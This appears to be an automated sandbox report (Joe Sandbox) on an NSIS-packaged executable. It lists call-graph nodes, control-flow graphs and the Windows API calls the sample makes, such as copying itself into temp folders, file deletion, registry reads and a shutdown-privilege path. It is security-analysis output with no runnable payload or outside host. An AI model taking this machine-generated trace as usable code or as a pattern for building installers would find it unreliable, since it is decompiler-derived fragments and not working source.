API calls 4128->4144 4146 4051b4 25 API calls 4128->4146 4148 405ef6 38 API calls 4128->4148 4150 406055 lstrcpynW 4128->4150 4151 4057fe 4128->4151 4129->4115 4131 4059d4 4130->4131 4133 4057fe 5 API calls 4131->4133 4132->4128 4136 40599e FindClose 4132->4136 4135 4059e0 4133->4135 4137 4059e4 4135->4137 4138 4059fa 4135->4138 4136->4129 4137->4114 4141 4051b4 25 API calls 4137->4141 4139 4051b4 25 API calls 4138->4139 4139->4114 4143 4059f1 4141->4143 4142->4128 4145 405ef6 38 API calls 4143->4145 4144->4132 4147 4059f8 4145->4147 4146->4128 4147->4114 4148->4128 4149->4117 4150->4128 4159 405c05 GetFileAttributesW 4151->4159 4154 40582b 4154->4128 4155 405821 DeleteFileW 4157 405827 4155->4157 4156 405819 RemoveDirectoryW 4156->4157 4157->4154 4158 405837 SetFileAttributesW 4157->4158 4158->4154 4160 40580a 4159->4160 4161 405c17 SetFileAttributesW 4159->4161 4160->4154 4160->4155 4160->4156 4161->4160 4162->3966 4163->3966 4164->3959 4166 405dd2 GetShortPathNameW 4165->4166 4167 405dac 4165->4167 4169 405ef1 4166->4169 4170 405de7 4166->4170 4192 405c2a GetFileAttributesW CreateFileW 4167->4192 4169->3976 4170->4169 4172 405def wsprintfA 4170->4172 4171 405db6 CloseHandle GetShortPathNameW 4171->4169 4173 405dca 4171->4173 4174 406077 18 API calls 4172->4174 4173->4166 4173->4169 4175 405e17 4174->4175 4193 405c2a GetFileAttributesW CreateFileW 4175->4193 4177 405e24 4177->4169 4178 405e33 GetFileSize GlobalAlloc 4177->4178 4179 405e55 4178->4179 4180 405eea CloseHandle 4178->4180 4181 405cad ReadFile 4179->4181 4180->4169 4182 405e5d 4181->4182 4182->4180 4194 405b8f lstrlenA 4182->4194 4185 405e74 lstrcpyA 4188 405e96 4185->4188 4186 405e88 4187 405b8f 4 API calls 4186->4187 4187->4188 4189 405ecd SetFilePointer 4188->4189 4190 405cdc WriteFile 4189->4190 4191 405ee3 GlobalFree 4190->4191 4191->4180 4192->4171 4193->4177 4195 405bd0 lstrlenA 4194->4195 4196 405ba9 lstrcmpiA 4195->4196 4198 405bd8 4195->4198 4197 405bc7 CharNextA 4196->4197 4196->4198 4197->4195 4198->4185 4198->4186 5262 100010e1 5265 10001111 5262->5265 5263 100011d8 GlobalFree 5264 100012ba 2 API calls 5264->5265 5265->5263 5265->5264 5266 100011d3 5265->5266 5267 10001272 2 API calls 5265->5267 5268 10001164 GlobalAlloc 5265->5268 5269 100011f8 GlobalFree 5265->5269 5270 100011c4 GlobalFree 5265->5270 5271 100012e1 lstrcpyW 5265->5271 5266->5263 5267->5270 5268->5265 5269->5265 5270->5265 5271->5265 5272 401ca3 5273 402ba2 18 API calls 5272->5273 5274 401ca9 IsWindow 5273->5274 5275 401a05 5274->5275 5276 402a27 SendMessageW 5277 402a41 InvalidateRect 5276->5277 5278 402a4c 5276->5278 5277->5278 4566 405128 4567 405138 4566->4567 4568 40514c 4566->4568 4570 405195 4567->4570 4571 40513e 4567->4571 4569 405154 IsWindowVisible 4568->4569 4578 405174 4568->4578 4569->4570 4573 405161 4569->4573 4574 40519a CallWindowProcW 4570->4574 4572 404165 SendMessageW 4571->4572 4575 405148 4572->4575 4580 404a7e SendMessageW 4573->4580 4574->4575 4578->4574 4585 404afe 4578->4585 4581 404aa1 GetMessagePos ScreenToClient SendMessageW 4580->4581 4582 404add SendMessageW 4580->4582 4583 404ad5 4581->4583 4584 404ada 4581->4584 4582->4583 4583->4578 4584->4582 4594 406055 lstrcpynW 4585->4594 4587 404b11 4595 405f9c wsprintfW 4587->4595 4589 404b1b 4590 40140b 2 API calls 4589->4590 4591 404b24 4590->4591 4596 406055 lstrcpynW 4591->4596 4593 404b2b 4593->4570 4594->4587 4595->4589 4596->4593 4597 40242a 4608 402cc9 4597->4608 4599 402434 4600 402bbf 18 API calls 4599->4600 4601 40243d 4600->4601 4602 402448 RegQueryValueExW 4601->4602 4603 40281e 4601->4603 4604 402468 4602->4604 4607 40246e RegCloseKey 4602->4607 4604->4607 4612 405f9c wsprintfW 4604->4612 4607->4603 4609 402bbf 18 API calls 4608->4609 4610 402ce2 4609->4610 4611 402cf0 RegOpenKeyExW 4610->4611 4611->4599 4612->4607 5279 40422d lstrcpynW lstrlenW 5280 40172d 5281 402bbf 18 API calls 5280->5281 5282 401734 SearchPathW 5281->5282 5283 40174f 5282->5283 4613 404b30 GetDlgItem GetDlgItem 4614 404b82 7 API calls 4613->4614 4617 404d9b 4613->4617 4615 404c25 DeleteObject 4614->4615 4616 404c18 SendMessageW 4614->4616 4618 404c2e 4615->4618 4616->4615 4624 404e60 4617->4624 4627 404e7f 4617->4627 4631 404dfb 4617->4631 4619 404c65 4618->4619 4620 404c3d 4618->4620 4621 404119 19 API calls 4619->4621 4623 406077 18 API calls 4620->4623 4625 404c79 4621->4625 4622 404f2b 4628 404f35 SendMessageW 4622->4628 4629 404f3d 4622->4629 4630 404c47 SendMessageW SendMessageW 4623->4630 4624->4627 4636 404e71 SendMessageW 4624->4636 4633 404119 19 API calls 4625->4633 4626 405113 4635 404180 8 API calls 4626->4635 4627->4622 4627->4626 4634 404ed8 SendMessageW 4627->4634 4628->4629 4637 404f56 4629->4637 4638 404f4f ImageList_Destroy 4629->4638 4645 404f66 4629->4645 4630->4618 4632 404a7e 5 API calls 4631->4632 4650 404e0c 4632->4650 4651 404c87 4633->4651 4634->4626 4640 404eed SendMessageW 4634->4640 4641 405121 4635->4641 4636->4627 4642 404f5f GlobalFree 4637->4642 4637->4645 4638->4637 4639 4050d5 4639->4626 4646 4050e7 ShowWindow GetDlgItem ShowWindow 4639->4646 4644 404f00 4640->4644 4642->4645 4643 404d5c GetWindowLongW SetWindowLongW 4647 404d75 4643->4647 4655 404f11 SendMessageW 4644->4655 4645->4639 4660 404afe 4 API calls 4645->4660 4663 404fa1 4645->4663 4646->4626 4648 404d93 4647->4648 4649 404d7b ShowWindow 4647->4649 4670 40414e SendMessageW 4648->4670 4669 40414e SendMessageW 4649->4669 4650->4624 4651->4643 4654 404cd7 SendMessageW 4651->4654 4656 404d56 4651->4656 4658 404d13 SendMessageW 4651->4658 4659 404d24 SendMessageW 4651->4659 4654->4651 4655->4622 4656->4643 4656->4647 4657 404d8e 4657->4626 4658->4651 4659->4651 4660->4663 4661 4050ab InvalidateRect 4661->4639 4662 4050c1 4661->4662 4671 404a39 4662->4671 4664 404fcf SendMessageW 4663->4664 4665 404fe5 4663->4665 4664->4665 4665->4661 4666 405046 4665->4666 4668 405059 SendMessageW SendMessageW 4665->4668 4666->4668 4668->4665 4669->4657 4670->4617 4674 404970 4671->4674 4673 404a4e 4673->4639 4675 404989 4674->4675 4676 406077 18 API calls 4675->4676 4677 4049ed 4676->4677 4678 406077 18 API calls 4677->4678 4679 4049f8 4678->4679 4680 406077 18 API calls 4679->4680 4681 404a0e lstrlenW wsprintfW SetDlgItemTextW 4680->4681 4681->4673 5284 4045b4 5285 4045e0 5284->5285 5286 4045f1 5284->5286 5345 40577e GetDlgItemTextW 5285->5345 5287 4045fd GetDlgItem 5286->5287 5290 40465c 5286->5290 5289 404611 5287->5289 5294 404625 SetWindowTextW 5289->5294 5297 405ab4 4 API calls 5289->5297 5291 404740 5290->5291 5299 406077 18 API calls 5290->5299 5343 4048ef 5290->5343 5291->5343 5347 40577e GetDlgItemTextW 5291->5347 5292 4045eb 5293 4062e9 5 API calls 5292->5293 5293->5286 5298 404119 19 API calls 5294->5298 5296 404180 8 API calls 5301 404903 5296->5301 5302 40461b 5297->5302 5303 404641 5298->5303 5304 4046d0 SHBrowseForFolderW 5299->5304 5300 404770 5305 405b11 18 API calls 5300->5305 5302->5294 5309 405a09 3 API calls 5302->5309 5306 404119 19 API calls 5303->5306 5304->5291 5307 4046e8 CoTaskMemFree 5304->5307 5308 404776 5305->5308 5310 40464f 5306->5310 5311 405a09 3 API calls 5307->5311 5348 406055 lstrcpynW 5308->5348 5309->5294 5346 40414e SendMessageW 5310->5346 5319 4046f5 5311->5319 5314 404655 5318 40642b 5 API calls 5314->5318 5315 40472c SetDlgItemTextW 5315->5291 5316 40478d 5317 40642b 5 API calls 5316->5317 5326 404794 5317->5326 5318->5290 5319->5315 5320 406077 18 API calls 5319->5320 5321 404714 lstrcmpiW 5320->5321 5321->5315 5323 404725 lstrcatW 5321->5323 5322 4047d5 5349 406055 lstrcpynW 5322->5349 5323->5315 5325 4047dc 5327 405ab4 4 API calls 5325->5327 5326->5322 5331 405a55 2 API calls 5326->5331 5332 40482d 5326->5332 5328 4047e2 GetDiskFreeSpaceW 5327->5328 5330 404806 MulDiv 5328->5330 5328->5332 5330->5332 5331->5326 5333 40489e 5332->5333 5335 404a39 21 API calls 5332->5335 5334 4048c1 5333->5334 5336 40140b 2 API calls 5333->5336 5350 40413b EnableWindow 5334->5350 5337 40488b 5335->5337 5336->5334 5338 4048a0 SetDlgItemTextW 5337->5338 5339 404890 5337->5339 5338->5333 5341 404970 21 API calls 5339->5341 5341->5333 5342 4048dd 5342->5343 5351 404549 5342->5351 5343->5296 5345->5292 5346->5314 5347->5300 5348->5316 5349->5325 5350->5342 5352 404557 5351->5352 5353 40455c SendMessageW 5351->5353 5352->5353 5353->5343 5354 4027b4 5355 4027ba 5354->5355 5356 4027c2 FindClose 5355->5356 5357 402a4c 5355->5357 5356->5357 5358 4042b6 5359 4042ce 5358->5359 5363 4043e8 5358->5363 5364 404119 19 API calls 5359->5364 5360 404452 5361 404524 5360->5361 5362 40445c GetDlgItem 5360->5362 5368 404180 8 API calls 5361->5368 5365 404476 5362->5365 5369 4044e5 5362->5369 5363->5360 5363->5361 5366 404423 GetDlgItem SendMessageW 5363->5366 5367 404335 5364->5367 5365->5369 5373 40449c 6 API calls 5365->5373 5389 40413b EnableWindow 5366->5389 5371 404119 19 API calls 5367->5371 5372 40451f 5368->5372 5369->5361 5374 4044f7 5369->5374 5378 404342 CheckDlgButton 5371->5378 5373->5369 5375 40450d 5374->5375 5376 4044fd SendMessageW 5374->5376 5375->5372 5379 404513 SendMessageW 5375->5379 5376->5375 5377 40444d 5380 404549 SendMessageW 5377->5380 5387 40413b EnableWindow 5378->5387 5379->5372 5380->5360 5382 404360 GetDlgItem 5388 40414e SendMessageW 5382->5388 5384 404376 SendMessageW 5385 404393 GetSysColor 5384->5385 5386 40439c SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5384->5386 5385->5386 5386->5372 5387->5382 5388->5384 5389->5377 5390 401b37 5391 401b44 5390->5391 5392 401b88 5390->5392 5393 401bcd 5391->5393 5398 401b5b 5391->5398 5394 401bb2 GlobalAlloc 5392->5394 5395 401b8d 5392->5395 5397 406077 18 API calls 5393->5397 5405 402288 5393->5405 5396 406077 18 API calls 5394->5396 5395->5405 5411 406055 lstrcpynW 5395->5411 5396->5393 5399 402282 5397->5399 5409 406055 lstrcpynW 5398->5409 5403 40579a MessageBoxIndirectW 5399->5403 5402 401b9f GlobalFree 5402->5405 5403->5405 5404 401b6a 5410 406055 lstrcpynW 5404->5410 5407 401b79 5412 406055 lstrcpynW 5407->5412 5409->5404 5410->5407 5411->5402 5412->5405 5413 402537 5414 402562 5413->5414 5415 40254b 5413->5415 5417 402596 5414->5417 5418 402567 5414->5418 5416 402ba2 18 API calls 5415->5416 5425 402552 5416->5425 5419 402bbf 18 API calls 5417->5419 5420 402bbf 18 API calls 5418->5420 5421 40259d lstrlenW 5419->5421 5422 40256e WideCharToMultiByte lstrlenA 5420->5422 5421->5425 5422->5425 5423 4025ca 5424 4025e0 5423->5424 5426 405cdc WriteFile 5423->5426 5425->5423 5425->5424 5427 405d0b 5 API calls 5425->5427 5426->5424 5427->5423 5428 4014b8 5429 4014be 5428->5429 5430 401389 2 API calls 5429->5430 5431 4014c6 5430->5431 4710 4015b9 4711 402bbf 18 API calls 4710->4711 4712 4015c0 4711->4712 4713 405ab4 4 API calls 4712->4713 4725 4015c9 4713->4725 4714 401629 4715 40165b 4714->4715 4716 40162e 4714->4716 4720 401423 25 API calls 4715->4720 4718 401423 25 API calls 4716->4718 4717 405a36 CharNextW 4717->4725 4719 401635 4718->4719 4729 406055 lstrcpynW 4719->4729 4727 401653 4720->4727 4722 405700 2 API calls 4722->4725 4723 40571d 5 API calls 4723->4725 4724 401642 SetCurrentDirectoryW 4724->4727 4725->4714 4725->4717 4725->4722 4725->4723 4726 40160f GetFileAttributesW 4725->4726 4728 405683 4 API calls 4725->4728 4726->4725 4728->4725 4729->4724 5432 10002a7f 5433 10002a97 5432->5433 5434 1000158f 2 API calls 5433->5434 5435 10002ab2 5434->5435

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 4032a0-4032d2 SetErrorMode GetVersion 1 4032d4-4032dc call 40642b 0->1 2 4032e5-403378 call 4063bf * 3 call 40642b * 2 #17 OleInitialize SHGetFileInfoW call 406055 GetCommandLineW call 406055 GetModuleHandleW 0->2 1->2 7 4032de 1->7 20 403382-40339c call 405a36 CharNextW 2->20 21 40337a-403381 2->21 7->2 24 4033a2-4033a8 20->24 25 4034b4-4034ce GetTempPathW call 40326f 20->25 21->20 27 4033b1-4033b7 24->27 28 4033aa-4033af 24->28 34 4034d0-4034ee GetWindowsDirectoryW lstrcatW call 40326f 25->34 35 403526-403540 DeleteFileW call 402dee 25->35 30 4033b9-4033bd 27->30 31 4033be-4033c2 27->31 28->27 28->28 30->31 32 403480-40348d call 405a36 31->32 33 4033c8-4033ce 31->33 53 403491-403497 32->53 54 40348f-403490 32->54 36 4033d0-4033d7 33->36 37 4033e8-403421 33->37 34->35 52 4034f0-403520 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40326f 34->52 48 4035f1-403602 call 4037c4 OleUninitialize 35->48 49 403546-40354c 35->49 42 4033d9-4033dc 36->42 43 4033de 36->43 44 403423-403428 37->44 45 40343e-403478 37->45 42->37 42->43 43->37 44->45 50 40342a-403432 44->50 45->32 51 40347a-40347e 45->51 71 403728-40372e 48->71 72 403608-403618 call 40579a ExitProcess 48->72 56 4035e1-4035e8 call 40389e 49->56 57 403552-40355d call 405a36 49->57 59 403434-403437 50->59 60 403439 50->60 51->32 61 40349f-4034ad call 406055 51->61 52->35 52->48 53->24 55 40349d 53->55 54->53 63 4034b2 55->63 70 4035ed 56->70 73 4035ab-4035b5 57->73 74 40355f-403594 57->74 59->45 59->60 60->45 61->63 63->25 70->48 76 403730-403746 GetCurrentProcess OpenProcessToken 71->76 77 4037ac-4037b4 71->77 81 4035b7-4035c5 call 405b11 73->81 82 40361e-403632 call 40571d lstrcatW 73->82 78 403596-40359a 74->78 84 403748-403776 LookupPrivilegeValueW AdjustTokenPrivileges 76->84 85 40377c-40378a call 40642b 76->85 79 4037b6 77->79 80 4037ba-4037be ExitProcess 77->80 87 4035a3-4035a7 78->87 88 40359c-4035a1 78->88 79->80 81->48 97 4035c7-4035dd call 406055 * 2 81->97 98 403634-40363a lstrcatW 82->98 99 40363f-403659 lstrcatW lstrcmpiW 82->99 84->85 95 403798-4037a3 ExitWindowsEx 85->95 96 40378c-403796 85->96 87->78 92 4035a9 87->92 88->87 88->92 92->73 95->77 101 4037a5-4037a7 call 40140b 95->101 96->95 96->101 97->56 98->99 99->48 100 40365b-40365e 99->100 104 403660-403665 call 405683 100->104 105 403667 call 405700 100->105 101->77 113 40366c-40367a SetCurrentDirectoryW 104->113 105->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 125 40371c-403723 call 405ef6 122->125 123->122 124 4036e5-403705 call 405ef6 call 406077 call 405735 123->124 124->122 134 403707-40370e CloseHandle 124->134 125->48 134->122
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                                      • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                      • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                      • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                      • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\grrezORe7h.exe",00000000), ref: 00403363
                                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\grrezORe7h.exe",00000020), ref: 0040338A
                                                                                                                        • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                        • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                                        • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                      • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                      • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\grrezORe7h.exe",00000000,?), ref: 0040362B
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\grrezORe7h.exe",00000000,?), ref: 0040363A
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\grrezORe7h.exe",00000000,?), ref: 00403645
                                                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\grrezORe7h.exe",00000000,?), ref: 00403651
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                                      • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\grrezORe7h.exe,0042AA28,00000001), ref: 004036DB
                                                                                                                      • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                      • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134412528.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134484312.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_grrezORe7h.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                      • String ID: "C:\Users\user\Desktop\grrezORe7h.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Vilkaarets$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\grrezORe7h.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                      • API String ID: 3586999533-3216160104
                                                                                                                      • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                      • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                      • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                      • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 149 404eb3-404eba 144->149 152 404de4-404deb 145->152 153 404dd7-404dde 145->153 150 404c40-404c5d call 406077 SendMessageW * 2 146->150 151 404c3d 146->151 147->143 148 404c65-404c91 call 404119 * 2 147->148 191 404c97-404c9d 148->191 192 404d5c-404d6f GetWindowLongW SetWindowLongW 148->192 155 404f2b-404f33 149->155 156 404ebc-404ec2 149->156 150->147 151->150 158 404e60-404e63 152->158 159 404ded-404df0 152->159 153->149 153->152 164 404f35-404f3b SendMessageW 155->164 165 404f3d-404f44 155->165 161 405113-405125 call 404180 156->161 162 404ec8-404ed2 156->162 158->149 163 404e65-404e6f 158->163 167 404df2-404df9 159->167 168 404dfb-404e10 call 404a7e 159->168 162->161 173 404ed8-404ee7 SendMessageW 162->173 175 404e71-404e7d SendMessageW 163->175 176 404e7f-404e89 163->176 164->165 169 404f46-404f4d 165->169 170 404f78-404f7f 165->170 167->158 167->168 168->158 190 404e12-404e23 168->190 178 404f56-404f5d 169->178 179 404f4f-404f50 ImageList_Destroy 169->179 182 4050d5-4050dc 170->182 183 404f85-404f91 call 4011ef 170->183 173->161 184 404eed-404efe SendMessageW 173->184 175->176 176->149 177 404e8b-404e95 176->177 186 404ea6-404eb0 177->186 187 404e97-404ea4 177->187 188 404f66-404f72 178->188 189 404f5f-404f60 GlobalFree 178->189 179->178 182->161 196 4050de-4050e5 182->196 209 404fa1-404fa4 183->209 210 404f93-404f96 183->210 194 404f00-404f06 184->194 195 404f08-404f0a 184->195 186->149 187->149 188->170 189->188 190->158 197 404e25-404e27 190->197 198 404ca0-404ca7 191->198 202 404d75-404d79 192->202 194->195 200 404f0b-404f24 call 401299 SendMessageW 194->200 195->200 196->161 201 4050e7-405111 ShowWindow GetDlgItem ShowWindow 196->201 205 404e29-404e30 197->205 206 404e3a 197->206 207 404d3d-404d50 198->207 208 404cad-404cd5 198->208 200->155 201->161 203 404d93-404d9b call 40414e 202->203 204 404d7b-404d8e ShowWindow call 40414e 202->204 203->137 204->161 214 404e32-404e34 205->214 215 404e36-404e38 205->215 218 404e3d-404e59 call 40117d 206->218 207->198 222 404d56-404d5a 207->222 216 404cd7-404d0d SendMessageW 208->216 217 404d0f-404d11 208->217 223 404fe5-405009 call 4011ef 209->223 224 404fa6-404fbf call 4012e2 call 401299 209->224 219 404f98 210->219 220 404f99-404f9c call 404afe 210->220 214->218 215->218 216->207 228 404d13-404d22 SendMessageW 217->228 229 404d24-404d3a SendMessageW 217->229 218->158 219->220 220->209 222->192 222->202 237 4050ab-4050bf InvalidateRect 223->237 238 40500f 223->238 242 404fc1-404fc7 224->242 243 404fcf-404fde SendMessageW 224->243 228->207 229->207 237->182 240 4050c1-4050d0 call 404a51 call 404a39 237->240 241 405012-40501d 238->241 240->182 244 405093-4050a5 241->244 245 40501f-40502e 241->245 247 404fc9 242->247 248 404fca-404fcd 242->248 243->223 244->237 244->241 250 405030-40503d 245->250 251 405041-405044 245->251 247->248 248->242 248->243 250->251 252 405046-405049 251->252 253 40504b-405054 251->253 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->244 256->255
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                      • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2134386862.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2134373782.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2134400273.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
